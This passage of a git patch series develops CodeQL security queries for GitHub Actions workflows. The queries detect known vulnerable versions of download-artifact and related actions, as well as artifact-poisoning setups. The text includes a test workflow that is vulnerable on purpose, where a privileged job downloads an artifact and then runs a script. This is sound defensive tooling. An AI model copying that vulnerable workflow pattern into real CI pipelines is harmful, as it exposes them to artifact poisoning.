$@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref new file mode 100644 index 00000000000..c9bd66e4dd0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -0,0 +1,2 @@ +Security/CWE-1395/UseOfKnownVulnerableAction.ql + From 483f6229ff5f6cf8e3551588fe94b4e474424c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:02:52 +0200 Subject: [PATCH 0439/1267] refactor: Create abstract class for known vulnerable actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 55 +++++++++++-------- .../UseOfKnownVulnerableAction.expected | 18 +++--- 2 files changed, 42 insertions(+), 31 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 5767619a5ca..16404edc500 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -13,26 +13,37 @@ import actions +abstract class KnownVulnerableAction extends UsesStep { + abstract string getFixedVersion(); +} + +class ActionsDownloadArtifact extends KnownVulnerableAction { + ActionsDownloadArtifact() { + this.getCallee() = "actions/download-artifact" and + ( + this.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + this.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) + } + + override string getFixedVersion() { result = "4.1.7" } +} + // gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate -from UsesStep step -where - step.getCallee() = "actions/download-artifact" and - ( - step.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - step.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) -select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step, - step.getVersion(), step, step.getCallee() +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 0a8c593cd86..4749fc35817 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | From 5f1884aa32780aa6edd0aa3e4ad90fd18f705761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:03:34 +0200 Subject: [PATCH 0440/1267] feat(queries): Add new queries to report path traversal via artifact poisoning --- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 56 +++++++++++++++++++ .../.github/workflows/artifactpoisoning81.yml | 2 +- .../ArtifactPoisoningPathTraversal.expected | 1 + .../ArtifactPoisoningPathTraversal.qlref | 2 + 4 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 00000000000..bf7623ef260 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -0,0 +1,56 @@ +/** + * @name Artifact Poisoning (Path Traversal). + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/path-traversal + * @tags actions + * security + * experimental + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.PoisonableSteps + +from UsesStep download +where + download.getCallee() = "actions/download-artifact" and + download.getCallee() = "actions/download-artifact" and + ( + download.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + download + .getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) and + ( + // exists a poisonable upload artifact in the same workflow + exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = poison and + poison.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + or + // upload artifact is not used in the same workflow + not exists(UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload + ) + ) +select download, "Potential artifact poisoning" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 7aa190007d8..768f244c210 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -25,7 +25,7 @@ jobs: permissions: contents: write steps: - - uses: actions/download-artifact@v4 + - uses: actions/download-artifact@v3 with: name: results - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 00000000000..10c1cd1ded6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 00000000000..7082dbada27 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + From 6cfec0d24574b46b9aa306547223bcff45f47439 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:37:00 +0200 Subject: [PATCH 0441/1267] feat(queries): Improve Use Of Vulnerable Actions query Move all info to a MaD config file so its easier to mantain Add other vulnerable actions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 14 +- ql/lib/codeql/actions/config/Config.qll | 14 + .../actions/config/ConfigExtensions.qll | 7 + .../codeql/actions/dataflow/FlowSources.qll | 78 +-- .../UseOfKnownVulnerableActionQuery.qll | 23 + ql/lib/ext/config/vulnerable_actions.yml | 641 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- .../CWE-1395/UseOfKnownVulnerableAction.ql | 31 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 23 +- ql/src/qlpack.yml | 2 +- .../UseOfKnownVulnerableAction.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 38 +- 12 files changed, 738 insertions(+), 149 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll create mode 100644 ql/lib/ext/config/vulnerable_actions.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e920a558c73..e05e3a8c41c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1146,7 +1146,9 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + int getMajorVersion() { + result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() + } /** Gets the argument expression for the given key. */ string getArgument(string key) { @@ -1192,10 +1194,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ - override string getVersion() { - result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") - } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -1227,12 +1227,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) else none() ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index efd8b26510b..fb1ae9af14d 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -114,3 +114,17 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + * - vulnerable_version: vulnerable version + * - vulnerable_sha: vulnerable sha + * - fixed_version: fixed version + */ +predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +) { + Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 4a492edeadf..cc1b5553f5f 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -50,3 +50,10 @@ extensible predicate untrustedEventPropertiesDataModel(string property, string k extensible predicate argumentInjectionSinksDataModel( string regexp, int command_group, int argument_group ); + +/** + * Holds for actions that are known to be vulnerable. + */ +extensible predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9f91af470b2..ce211584749 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -142,58 +142,14 @@ class DornyPathsFilterSource extends RemoteFlowSource { */ class TJActionsChangedFilesSource extends RemoteFlowSource { TJActionsChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 41 or - u.getVersion() - .matches([ - "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", - "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", - "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", - "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", - "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", - "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", - "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", - "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", - "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", - "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", - "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", - "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", - "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", - "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", - "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", - "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", - "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", - "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", - "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", - "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", - "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", - "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", - "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", - "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", - "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", - "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", - "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", - "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", - "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", - "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", - "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", - "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", - "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", - "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", - "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", - "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", - "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", - "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", - "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", - "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", - "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", - "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", - "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", - "f0751de", "eef9423" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) @@ -207,24 +163,14 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { */ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { TJActionsVerifyChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 or - u.getVersion() - .matches([ - "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", - "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", - "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", - "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", - "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", - "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", - "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", - "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", - "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", - "48ddf88" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 00000000000..bbb021fe3d5 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -0,0 +1,23 @@ +import actions +import codeql.actions.config.Config + +class KnownVulnerableAction extends UsesStep { + string vulnerable_action; + string fixed_version; + string vulnerable_version; + string vulnerable_sha; + + KnownVulnerableAction() { + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and + this.getCallee() = vulnerable_action and + (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha) + } + + string getFixedVersion() { result = fixed_version } + + string getVulnerableAction() { result = vulnerable_action } + + string getVulnerableVersion() { result = vulnerable_version } + + string getVulnerableSha() { result = vulnerable_sha } +} diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml new file mode 100644 index 00000000000..eb452983bfc --- /dev/null +++ b/ql/lib/ext/config/vulnerable_actions.yml @@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - ["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - 